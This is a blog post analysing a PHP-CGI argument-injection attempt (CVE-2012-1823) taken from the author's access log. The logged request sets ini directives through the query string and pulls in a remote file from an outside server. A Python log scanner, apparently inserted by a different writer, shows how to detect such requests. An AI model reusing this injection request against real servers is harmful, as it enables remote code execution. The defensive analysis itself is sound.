Update: More information about this attack is now available from SANS: PHP vulnerability CVE-2012-1823 being exploited in the wild
I filed this one under "programming" because at some point in their career every programmer will be asked to investigate suspicious activities. In all likelihood they have received zero training on how to do something like this. Although I did my master's thesis on artificial intelligence for network intrusion detection I hardly consider myself a security expert.
Still, I've been on the receiving end of many "hey, could you take a look at this?" requests, usually for web traffic coming from a country that's a known haven for hackers. Yes, I know that most of the LulzSec hackers were arrested here in the United States. The key word there is "arrested": none of them are currently openly running fake anti-virus sites with authorities from their government looking the other way. We're plenty screwed-up over here, but we sure excel at jailing people.
The other day I caught a PHP hacking attempt against this site that I thought was worth exploring a little bit. I probably get hit with 2-3 attempts from botnets a day, and they all look pretty much the same: mundane stuff like "GET /phpMyAdmin/index.php". I don't run PHP on this site; everything is plain HTML+JavaScript because I'm old-school like that. Plus, I get to debug web and application servers enough at work already. So for me these attacks are more amusing than concerning.
Anyway, this particular attack was not only different but also not found on Google. So this is either something new or experimental, which is what makes it interesting.
It started with the following request:
74.242.228.35
[18/May/2012:10:48:16 -0700]
"GET /index.php?
-dsafe_mode%3dOff
+-ddisable_functions%3dNULL
+-dallow_url_fopen%3dOn
+-dallow_url_include%3dOn
+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt
HTTP/1.1"
404 1803 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"
I have light experience with PHP but can tell right away what this is trying to do. This request is hoping that your site is misconfigured to the point where an unauthenticated internet user can change PHP settings from the query string. If so, it turns off safe mode, re-enables functions and remote URL access that you would normally keep disabled, and then prepends a file fetched from a remote server to your index page.
At first I figured this was just some script kiddie whom I could report to their ISP if I felt like burning a couple of calories. The source IP address resolves to AT&T in North Carolina, so this theory held up for a second. Then I looked at the browser string one more time: Windows 2000 running Internet Explorer 6. So either we have a 12-year-old PC someone built for their grandparents to check email on, or a bot that's using a fake user agent string. A very quick Google search reveals a dozen different bots using this string.
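To show how this kind of request can be picked out of an access log, here is an added example (my own code, not from the post or from SANS) that parses combined-format log lines, decodes the query string the way php-cgi would have received it as argv, and reports which ini directives are being set and which remote file is being pulled in through auto_prepend_file. The sample log lines are constructed from the request above plus a benign request for contrast; the literal-'=' check reflects the CGI rule that only a query string without an unencoded '=' is passed to the interpreter as command-line arguments.

```python
import re
from urllib.parse import unquote

# Combined log format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')

# ini directives that, when set from a query string, mark php-cgi (CVE-2012-1823) abuse.
SUSPICIOUS = {"auto_prepend_file", "auto_append_file", "allow_url_include",
              "allow_url_fopen", "safe_mode", "disable_functions"}

# Constructed sample: the request from the post, plus a benign request for contrast.
SAMPLE_LOG = [
    '74.242.228.35 - - [18/May/2012:10:48:16 -0700] "GET /index.php?-dsafe_mode%3dOff'
    '+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn'
    '+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt HTTP/1.1" 404 1803 "-" '
    '"Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"',
    '192.0.2.10 - - [18/May/2012:10:49:00 -0700] "GET /index.php?page=home HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
]

def inspect_request(request_line):
    # Return a finding for a php-cgi '-d' argument-injection attempt, else None.
    m = re.match(r"\S+ \S*?\?(\S*)", request_line)  # method, then path?query
    if not m:
        return None
    query = m.group(1)
    # Only a query with no literal '=' reaches php-cgi as argv (hence the %3d
    # encoding); '+' separates the argv entries, so split on it before decoding.
    argv_eligible = "=" not in query
    directives = {}
    for arg in (unquote(a) for a in query.split("+")):
        if arg.startswith("-d") and "=" in arg:
            key, _, value = arg[2:].partition("=")
            directives[key.strip()] = value.strip()
    if not directives:
        return None
    remote = [v for k, v in directives.items()
              if k in ("auto_prepend_file", "auto_append_file") and re.match(r"[a-z]+://", v)]
    return {"argv_eligible": argv_eligible, "directives": directives,
            "suspicious": sorted(set(directives) & SUSPICIOUS), "remote_includes": remote}

def scan_log(lines):
    # Run inspect_request over combined-format log lines, attaching ip/time/status.
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        finding = inspect_request(m.group("req")) if m else None
        if finding:
            finding.update(ip=m.group("ip"), time=m.group("time"), status=m.group("status"))
            findings.append(finding)
    return findings
```

Feeding scan_log a real access log yields one finding per request that sets php-cgi directives, with the remote include URL ready to hand to whoever blocks it upstream.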
The real giveaway though is the IP address it's trying to import a file from - 81.17.24.82. Golly gee Beaver, I wonder what country that could possibly resolve to?
IP address: 81.17.24.82
Reverse DNS: [No reverse DNS entry per dns01.privatelayer.com.]
Reverse DNS authenticity: [Unknown]
ASN: 35153
ASN Name: RELIANS (ISP Relians, Moscow, Russia)
IP range connectivity: 9
Registrar (per ASN): RIPE
Country (per IP registrar): EU [EU]
Country Currency: EUR [euros]
Country IP Range: 81.17.16.0 to 81.17.31.255
Country fraud profile: Normal
City (per outside source): Moscow, Moskva
Country (per outside source): RU [Russian Federation]
Private (internal) IP? No
IP address registrar: whois.ripe.net
Known Proxy? No